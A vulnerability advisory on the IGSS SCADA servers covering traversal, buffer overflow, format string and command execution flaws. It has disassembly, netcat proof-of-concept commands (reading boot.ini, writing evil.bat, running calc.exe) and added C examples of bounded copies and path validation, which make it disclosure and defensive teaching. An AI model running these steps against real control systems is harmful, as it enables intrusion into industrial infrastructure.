Luigi Auriemma
Application:  IGSS (Interactive Graphical SCADA System)
Versions:     IGSSdataServer.exe <=
Platforms:    Windows
Date:         21 Mar 2011 (found 10 Jan 2011)
Author:       Luigi Auriemma
e-mail:
web:
=============== 1) Introduction ===============
IGSS (Interactive Graphical SCADA System) is a SCADA solution developed by 7-Technologies and used mainly in Denmark and the US.
Information from the vendor's website: "IGSS is the complete automation software – a SCADA system for process control and supervision - with a long row of releases since the start of 7T 25 years ago. At that time, 7T was the first company in the world to develop an object oriented and mouse operated SCADA system under the name of IGSS."
Directory Traversal:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
Opcode 0xd is used for the file operations: creation, reading, writing, deleting, renaming and so on.
The server is affected by a directory traversal that lets an attacker download (command 0x3) or upload and overwrite (command 0x2) any file on the disk where the software is installed.
=========== 3) The Code ===========
Example for downloading c:\boot.ini:
nc SERVER 12401 < igss_1a.dat
Example for writing/overwriting the file c:\evil.bat:
nc SERVER 12401 < igss_1b.dat
Remote Stack Overflow:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
Opcode 0xd is used for the file operations: creation, reading, writing, deleting, renaming and so on.
All the commands supported by this opcode except "FileReserve" (0x7) are affected by buffer overflows caused by copying the client-supplied filename into 256-byte stack buffers.
The following is the list of the copying functions for each command (I don't remember the exact version from which I got them):
  "ListAll"    (0x1)  00406e91
  "Write File" (0x2)  004071dd
  "ReadFile"   (0x3)  004072fd
  "Delete"     (0x4)  00406fad
  "RenameFile" (0x5)  00407094 and 004070cf
  "FileInfo"   (0x6)  0040746f
=========== 3) The Code ===========
nc SERVER 12401 < igss_2a.dat
nc SERVER 12401 < igss_2b.dat
nc SERVER 12401 < igss_2c.dat
nc SERVER 12401 < igss_2d.dat
nc SERVER 12401 < igss_2e.dat
nc SERVER 12401 < igss_2f.dat
Remote Stack Overflow:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
Opcode 0x7 is used for handling the RMS report templates, and through the "Add" command (0x4) it is possible to trigger several buffer overflows caused by copying client-supplied strings into small stack buffers with inlined strcpy-style loops that stop only at a NUL byte:
00409B4F  . 8D46 04         LEA EAX,DWORD PTR DS:[ESI+4]       ; string from offset 0x16 of the packet
00409B52  . 8D5424 1A       LEA EDX,DWORD PTR SS:[ESP+1A]
00409B56  . 83C4 0C         ADD ESP,0C
00409B59  . 2BD0            SUB EDX,EAX
00409B5B  . EB 03           JMP SHORT 00409B60
00409B5D    8D49 00         LEA ECX,DWORD PTR DS:[ECX]
00409B60  > 8A08            MOV CL,BYTE PTR DS:[EAX]
00409B62  . 880C02          MOV BYTE PTR DS:[EDX+EAX],CL
00409B65  . 40              INC EAX
00409B66  . 84C9            TEST CL,CL
00409B68  .^75 F6           JNZ SHORT 00409B60
00409B6A  . 8A46 71         MOV AL,BYTE PTR DS:[ESI+71]
00409B6D  . 884424 0D       MOV BYTE PTR SS:[ESP+D],AL
00409B71  . 8D46 2C         LEA EAX,DWORD PTR DS:[ESI+2C]      ; from offset 0x3e
00409B74  . 8D5424 36       LEA EDX,DWORD PTR SS:[ESP+36]
00409B78  . 2BD0            SUB EDX,EAX
00409B7A  . 8D9B 00000000   LEA EBX,DWORD PTR DS:[EBX]
00409B80  > 8A08            MOV CL,BYTE PTR DS:[EAX]
00409B82  . 880C02          MOV BYTE PTR DS:[EDX+EAX],CL
00409B85  . 40              INC EAX
00409B86  . 84C9            TEST CL,CL
00409B88  .^75 F6           JNZ SHORT 00409B80
00409B8A  . 8D46 6C         LEA EAX,DWORD PTR DS:[ESI+6C]      ; from offset 0x7e
00409B8D  . 8D5424 76       LEA EDX,DWORD PTR SS:[ESP+76]
00409B91  . 2BD0            SUB EDX,EAX
00409B93  > 8A08            MOV CL,BYTE PTR DS:[EAX]
00409B95  . 880C02          MOV BYTE PTR DS:[EDX+EAX],CL
00409B98  . 40              INC EAX
00409B99  . 84C9            TEST CL,CL
00409B9B  .^75 F6           JNZ SHORT 00409B93
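The copy loops above, and the filename copies of the opcode 0xd handlers listed earlier, are the same pattern: a strcpy-style loop that runs until it finds a NUL, into a stack buffer of fixed size. The following is an added example (not the vendor's code) that renders that loop in C next to a bounded copy that requires the string to be terminated inside its own field. The packet offsets 0x16/0x3e/0x7e are the ones in the listing; the 0x28- and 0x40-byte field sizes are inferred from the spacing of those offsets (and of the stack buffers at ESP+0x36 and ESP+0x76) and are an assumption, as are the two constructed packets.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the vendor's code: the inlined strcpy loops of the
 * "Add" handler (00409B60, 00409B80, 00409B93) and the filename copies of
 * the opcode 0xd handlers rendered in C, beside a bounded copy.  Packet
 * offsets 0x16/0x3e/0x7e are from the listing; the 0x28- and 0x40-byte field
 * sizes are inferred from the spacing of those offsets (and of the stack
 * buffers at ESP+0x36 / ESP+0x76) and are an assumption. */
enum { F_NAME_OFF = 0x16, F_NAME_LEN = 0x28,
       F_DESC_OFF = 0x3e, F_DESC_LEN = 0x40 };
#define PKT_LEN (F_DESC_OFF + F_DESC_LEN)   /* only the first two fields */

/* What the loop at 00409B60 does: copy until a NUL is found, however far
 * away that is.  Returns the number of bytes it would write, terminator
 * included.  The scan stops at pkt_len only to keep this simulation in
 * bounds; the real loop has no limit at all. */
size_t unbounded_copy_len(const unsigned char *pkt, size_t pkt_len, size_t off)
{
    size_t i = off;
    while (i < pkt_len && pkt[i] != 0)
        i++;
    return (i - off) + 1;
}

/* Length of the string at s, scanning at most max bytes (a local strnlen). */
static size_t bounded_strlen(const unsigned char *s, size_t max)
{
    size_t n = 0;
    while (n < max && s[n] != 0)
        n++;
    return n;
}

/* Hardened copy: the field must lie inside the received packet, the
 * destination must hold the whole field, and the string must be terminated
 * inside the field.  Returns 0 on success, -1 on rejection. */
int bounded_field_copy(char *dst, size_t dst_len,
                       const unsigned char *pkt, size_t pkt_len,
                       size_t off, size_t field_len)
{
    if (off > pkt_len || field_len > pkt_len - off || dst_len < field_len)
        return -1;
    size_t n = bounded_strlen(pkt + off, field_len);
    if (n == field_len)
        return -1;                       /* no terminator within the field */
    memcpy(dst, pkt + off, n + 1);
    return 0;
}

/* 1 if the original loop would overrun the name field of this packet. */
int add_name_overflows(const unsigned char *pkt, size_t pkt_len)
{
    return unbounded_copy_len(pkt, pkt_len, F_NAME_OFF) > F_NAME_LEN;
}

/* Constructed packets (not captured traffic); only the two fields are set. */
void build_benign_packet(unsigned char *pkt)
{
    memset(pkt, 0, PKT_LEN);
    memcpy(pkt + F_NAME_OFF, "weekly", 7);
    memcpy(pkt + F_DESC_OFF, "constructed test", 17);
}

/* Both fields filled without a terminator: the loop runs through the name
 * field, through the description field and on into whatever follows. */
void build_hostile_packet(unsigned char *pkt)
{
    memset(pkt, 0, F_NAME_OFF);          /* header bytes before the first field */
    memset(pkt + F_NAME_OFF, 'A', F_NAME_LEN);
    memset(pkt + F_DESC_OFF, 'B', F_DESC_LEN);
}

int main(void)
{
    unsigned char pkt[PKT_LEN];
    char name[F_NAME_LEN];
    build_hostile_packet(pkt);
    printf("loop would write %zu bytes into a %d-byte field; bounded copy: %d\n",
           unbounded_copy_len(pkt, PKT_LEN, F_NAME_OFF), F_NAME_LEN,
           bounded_field_copy(name, sizeof name, pkt, PKT_LEN, F_NAME_OFF, F_NAME_LEN));
    return 0;
}
```

The hostile packet is exactly what the PoC files rely on: a field with no NUL inside its slot, so the loop keeps copying past the end of the destination buffer. The bounded version rejects such a packet instead of clipping it, which is the right choice for a protocol handler, since a silently truncated name would be used later in path building and could still misbehave.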
=========== 3) The Code ===========
nc SERVER 12401 < igss_3.dat
Remote Stack Overflow:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
Opcode 0x7 is used for handling the RMS report templates, and through the "ReadFile" (0x6) and "Write File" (0x5) commands it is possible to trigger a buffer overflow caused by building the full path string with sprintf in a 256-byte stack buffer that belongs to the calling function:
0040F840  /$ 8B4424 04      MOV EAX,DWORD PTR SS:[ESP+4]
0040F844  |. 50             PUSH EAX
0040F845  |. 83C1 04        ADD ECX,4
0040F848  |. 51             PUSH ECX
0040F849  |. 8B4C24 10      MOV ECX,DWORD PTR SS:[ESP+10]
0040F84D  |. 68 54A54300    PUSH 0043A554                      ; "%s\%s.RMS"
0040F852  |. 51             PUSH ECX
0040F853  |. E8 120F0100    CALL 0042076A                      ; sprintf
0040F858  |. 83C4 10        ADD ESP,10
0040F85B  \. C2 0800        RETN 8
=========== 3) The Code ===========
Proof-of-concept via "ReadFile":
nc SERVER 12401 < igss_4a.dat
Proof-of-concept via "Write File":
nc SERVER 12401 < igss_4b.dat
Remote Stack Overflow:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
Opcode 0x7 is used for handling the RMS report templates. After the "Rename" (0x2), "Delete" (0x3) and "Add" (0x4) commands have been parsed, the function at 0040F910 is called to build the line to be placed in RMS.DIC, and it is vulnerable to a buffer overflow of a stack buffer of about 512 bytes:
0040F9FE  |. 8D0432          |LEA EAX,DWORD PTR DS:[EDX+ESI]
0040FA01  |. 8D48 6A         |LEA ECX,DWORD PTR DS:[EAX+6A]
0040FA04  |. 51              |PUSH ECX
0040FA05  |. 8D50 2A         |LEA EDX,DWORD PTR DS:[EAX+2A]
0040FA08  |. 52              |PUSH EDX
0040FA09  |. 0FB650 01       |MOVZX EDX,BYTE PTR DS:[EAX+1]
0040FA0D  |. 8D48 02         |LEA ECX,DWORD PTR DS:[EAX+2]
0040FA10  |. 51              |PUSH ECX
0040FA11  |. 52              |PUSH EDX
0040FA12  |. 8D8424 24020000 |LEA EAX,DWORD PTR SS:[ESP+224]
0040FA19  |. 68 E0A54300     |PUSH 0043A5E0                    ; "%d,%s,%s,%s"
0040FA1E  |. 50              |PUSH EAX
0040FA1F  |. E8 460D0100     |CALL 0042076A                    ; sprintf
=========== 3) The Code ===========
The following proof-of-concept exploits the vulnerability through the "Rename" command, because it is the only one of the three commands that is not affected by other vulnerabilities before execution reaches the buggy function:
nc SERVER 12401 < igss_5a.dat   (adds the "old_name" template)
nc SERVER 12401 < igss_5b.dat
Remote Format String:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
The logging function Shmemmgr.logText, which writes messages to GSST.LOG, has a printf-like prototype, but the function at 0040cec0 that handles all the internal log messages does not supply a fixed format argument when calling it: the message itself, which can contain client-supplied text, is passed in the position of the format string and ends up as the format argument of vsprintf_s:
0040CF5B  |> 8D4424 04      LEA EAX,DWORD PTR SS:[ESP+4]
0040CF5F  |. 50             PUSH EAX
0040CF60  |. 57             PUSH EDI
0040CF61  |. 6A 0D          PUSH 0D
0040CF63  |. 6A 01          PUSH 1
0040CF65  |. FF15 6C834300  CALL DWORD PTR DS:[<&Shmemmgr9.logText>] ; Shmemmgr.logText
...
005A55E6  . 8B4D EC         MOV ECX,DWORD PTR SS:[EBP-14]
005A55E9  . 51              PUSH ECX
005A55EA  . 8B55 14         MOV EDX,DWORD PTR SS:[EBP+14]
005A55ED  . 52              PUSH EDX
005A55EE  . 68 00280000     PUSH 2800
005A55F3  . 8D85 E8D7FFFF   LEA EAX,DWORD PTR SS:[EBP-2818]
005A55F9  . 50              PUSH EAX
005A55FA  . FF15 20026200   CALL DWORD PTR DS:[<&MSVCR90.vsprintf_s>] ; MSVCR90.vsprintf_s
Note that it is not clear whether this vulnerability is exploitable for code execution.
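The following is an added example (not the vendor's code) that shows the shape of the bug and of its fix in C: a logText-like sink with the printf-style prototype described above, the call as 0040CF5B makes it, and the corrected call with a fixed "%s" format. The log is kept in a memory buffer instead of GSST.LOG, the 0x2800 size is the one pushed before the vsprintf_s call in the listing, and the meaning of the level/category arguments (the PUSH 1 / PUSH 0D) is an assumption; the hostile message is constructed input.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the vendor's code: a logText-like sink with the
 * printf-style prototype the advisory describes, the call as 0040CF5B makes
 * it, and the corrected call.  Lines go to a memory buffer instead of
 * GSST.LOG; the level/category parameters only mirror the PUSH 1 / PUSH 0D
 * arguments and their meaning is an assumption. */
#define LOG_LINE_MAX 0x2800   /* size passed to vsprintf_s in the listing */

static char last_line[LOG_LINE_MAX];

/* The sink: format string plus variadic arguments, bounded like vsprintf_s.
 * Returns the length of the stored line, or -1 on truncation. */
int log_text(int level, int category, const char *fmt, ...)
{
    (void)level; (void)category;
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(last_line, sizeof last_line, fmt, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= sizeof last_line) ? -1 : n;
}

const char *last_log_line(void) { return last_line; }

/* The bug: the message, which may carry client-supplied text, is passed in
 * the format-string position.  Kept for contrast; calling it with text that
 * contains '%' directives is undefined behaviour, which is the point. */
int log_client_message_vuln(const char *msg)
{
    return log_text(1, 0xd, msg);
}

/* The fix: a fixed format string, the message as an ordinary argument. */
int log_client_message(const char *msg)
{
    return log_text(1, 0xd, "%s", msg);
}

/* Counts the directives printf would act on in msg ("%%" is a literal);
 * usable as a detection rule over log lines or captured traffic. */
int count_format_directives(const char *msg)
{
    int n = 0;
    for (const char *p = msg; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {       /* escaped percent, no directive */
            p++;
            continue;
        }
        n++;
    }
    return n;
}

int main(void)
{
    const char *hostile = "ALARM %x %x %n tank1";   /* constructed input */
    log_client_message(hostile);
    printf("stored verbatim: %s (directives: %d)\n", last_log_line(),
           count_format_directives(hostile));
    return 0;
}
```

With the fixed caller the "%x" and "%n" sequences are stored as literal text; with the original calling convention they would be interpreted by vsprintf_s, reading stack data for "%x" and, in the "%n" case, attempting a write, which is why the advisory leaves code execution as an open question rather than a certainty.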
=========== 3) The Code ===========
nc SERVER 12401 < igss_6.dat
Remote Stack Overflow:
====== 2) Bug ======
IGSSdataServer.exe is a server listening on port 12401 that is active when the project is started.
Opcode 0x8 is used for handling the STDREP requests, and through command 0x4 it is possible to trigger a buffer overflow caused by building a SQL query with sprintf in a 256-byte stack buffer:
0040A4B5  . 8B46 04         MOV EAX,DWORD PTR DS:[ESI+4]
0040A4B8  . 8B48 16         MOV ECX,DWORD PTR DS:[EAX+16]
0040A4BB  . 51              PUSH ECX
0040A4BC  . 83C0 1A         ADD EAX,1A
0040A4BF  . 50              PUSH EAX
0040A4C0  . 68 7C984300     PUSH 0043987C                      ; "UPDATE ReportFormats SET RMSref={%s} WHERE (FormatID=%d)"
0040A4C5  . 8BD7            MOV EDX,EDI
0040A4C7  . 52              PUSH EDX
0040A4C8  . E8 9D620100     CALL 0042076A                      ; sprintf
Note that it is not clear whether this vulnerability is exploitable for code execution.
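The three sprintf calls quoted in this advisory (the "%s\%s.RMS" path, the "%d,%s,%s,%s" RMS.DIC line and the UPDATE query above) share one defect: a format with unbounded "%s" conversions written into a fixed-size stack buffer. The following is an added example (not the vendor's code) that renders them in C beside a bounded replacement that treats truncation as an error. The buffer sizes are the ones the advisory gives; the parameter names, the directory and the 299-byte name are assumptions made for the example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Added example, not the vendor's code: the three sprintf() calls quoted in
 * this advisory rendered in C, beside a bounded replacement.  The buffer
 * sizes are the ones the advisory gives (256 bytes for the RMS path and the
 * SQL query, about 512 for the RMS.DIC line); the parameter names are
 * assumptions. */
#define RMS_PATH_LEN 256
#define DIC_LINE_LEN 512
#define SQL_LEN      256

/* The listing at 0040F840: no length check at all.  Shown for contrast;
 * any client-controlled name longer than the buffer overflows the stack. */
void build_rms_path_vuln(char path[RMS_PATH_LEN], const char *dir, const char *name)
{
    sprintf(path, "%s\\%s.RMS", dir, name);
}

/* Bounded replacement: vsnprintf, and truncation is reported as an error
 * rather than being silently accepted.  Returns the length or -1. */
int format_checked(char *dst, size_t dst_len, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int n = vsnprintf(dst, dst_len, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= dst_len) {
        if (dst_len)
            dst[0] = '\0';
        return -1;
    }
    return n;
}

/* "%s\%s.RMS" path used by the RMS "ReadFile" / "Write File" commands */
int build_rms_path(char path[RMS_PATH_LEN], const char *dir, const char *name)
{
    return format_checked(path, RMS_PATH_LEN, "%s\\%s.RMS", dir, name);
}

/* "%d,%s,%s,%s" line that the function at 0040F910 places in RMS.DIC */
int build_dic_line(char line[DIC_LINE_LEN], int id,
                   const char *a, const char *b, const char *c)
{
    return format_checked(line, DIC_LINE_LEN, "%d,%s,%s,%s", id, a, b, c);
}

/* query built by the STDREP opcode 0x8 / command 0x4 handler */
int build_update_query(char q[SQL_LEN], const char *rmsref, int format_id)
{
    return format_checked(q, SQL_LEN,
        "UPDATE ReportFormats SET RMSref={%s} WHERE (FormatID=%d)",
        rmsref, format_id);
}

int main(void)
{
    char path[RMS_PATH_LEN], big[300];
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';                /* constructed 299-byte name */
    printf("short name -> %d\n", build_rms_path(path, "C:\\IGSS\\rms", "weekly"));
    printf("299-byte name -> %d (sprintf would have overflowed)\n",
           build_rms_path(path, "C:\\IGSS\\rms", big));
    return 0;
}
```

Returning an error on truncation matters as much as the bound itself: a path or a DIC line that was clipped to fit would still be used by the caller, so the client should get a failure and the request should be dropped.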
=========== 3) The Code ===========
nc SERVER 12401 < igss_7.dat
Arbitrary Command Execution:
====== 2) Bug ======
dc.exe is a server listening on port 12397 that is active when the project is started.
Opcodes 0xa and 0x17 are used to launch the executables located in the software's folder, but through directory traversal it is possible to execute any executable on the disk where the software is installed, and to specify arbitrary arguments for it.
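Both traversals in this advisory (the opcode 0xd file commands of IGSSdataServer.exe and the opcodes 0xa/0x17 of dc.exe) come from using a client-supplied name under the installation folder without checking it. The following is an added example (not the vendor's code) of the validation a practitioner would put in front of such a name on Windows: it accepts only a plain relative path with no "." or ".." components, no drive letter or stream colon, no leading separator (which also covers UNC paths) and no trailing dots or spaces, and then joins it to the base directory with a bounded write. The base directory and the test names are assumptions.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the vendor's code: the validation that neither
 * IGSSdataServer.exe (opcode 0xd file commands) nor dc.exe (opcodes 0xa and
 * 0x17) performs on the client-supplied name before using it under the
 * installation folder.  The base directory used below is a placeholder. */
static int is_sep(char c) { return c == '\\' || c == '/'; }

/* One path component is acceptable when it is non-empty, is not made only
 * of dots ("." and ".." included) and does not end in a dot or a space,
 * which Windows strips and which could therefore alias another name. */
static int component_ok(const char *s, size_t len)
{
    if (len == 0)
        return 0;
    size_t dots = 0;
    for (size_t i = 0; i < len; i++)
        if (s[i] == '.')
            dots++;
    if (dots == len)
        return 0;
    if (s[len - 1] == '.' || s[len - 1] == ' ')
        return 0;
    return 1;
}

/* Returns 1 if name is a plain relative path that stays below the base
 * directory when joined to it, 0 otherwise. */
int name_stays_in_base(const char *name)
{
    if (name == NULL || name[0] == '\0')
        return 0;
    if (is_sep(name[0]))                 /* "\x", "/x" and "\\server\share" */
        return 0;
    if (strchr(name, ':') != NULL)       /* "C:..." and "file:stream" */
        return 0;
    const char *p = name;
    while (*p) {
        const char *start = p;
        while (*p && !is_sep(*p))
            p++;
        if (!component_ok(start, (size_t)(p - start)))
            return 0;
        if (*p) {
            p++;                         /* skip the separator */
            if (*p == '\0')              /* trailing separator: no file name */
                return 0;
        }
    }
    return 1;
}

/* Joins base and name with a bounded write.  Returns the resulting length,
 * or -1 when the name is rejected or the result would not fit. */
int join_under_base(char *out, size_t out_len, const char *base, const char *name)
{
    if (!name_stays_in_base(name))
        return -1;
    int n = snprintf(out, out_len, "%s\\%s", base, name);
    if (n < 0 || (size_t)n >= out_len) {
        if (out_len)
            out[0] = '\0';
        return -1;
    }
    return n;
}

int main(void)
{
    const char *names[] = { "weekly.rms", "templates\\weekly.rms",
                            "..\\..\\boot.ini", "templates/../../evil.bat",
                            "C:\\evil.bat", "\\\\srv\\share\\calc.exe" };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-28s %s\n", names[i],
               name_stays_in_base(names[i]) ? "ok" : "rejected");
    return 0;
}
```

This is a pre-filter, not the whole answer: on Windows the server should also reject reserved device names (CON, NUL, COM1 and the like) and 8.3 short names, and after joining it should canonicalise the result (GetFullPathName) and compare the prefix against the base directory case-insensitively, because that final compare is what catches anything the syntactic check misses.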
=========== 3) The Code ===========
Two examples for executing calc.exe ("calc.exe arg1 arg2 arg3"):
nc SERVER 12397 < igss_8a.dat
nc SERVER 12397 < igss_8b.dat
====== 4) Fix ======
No fix.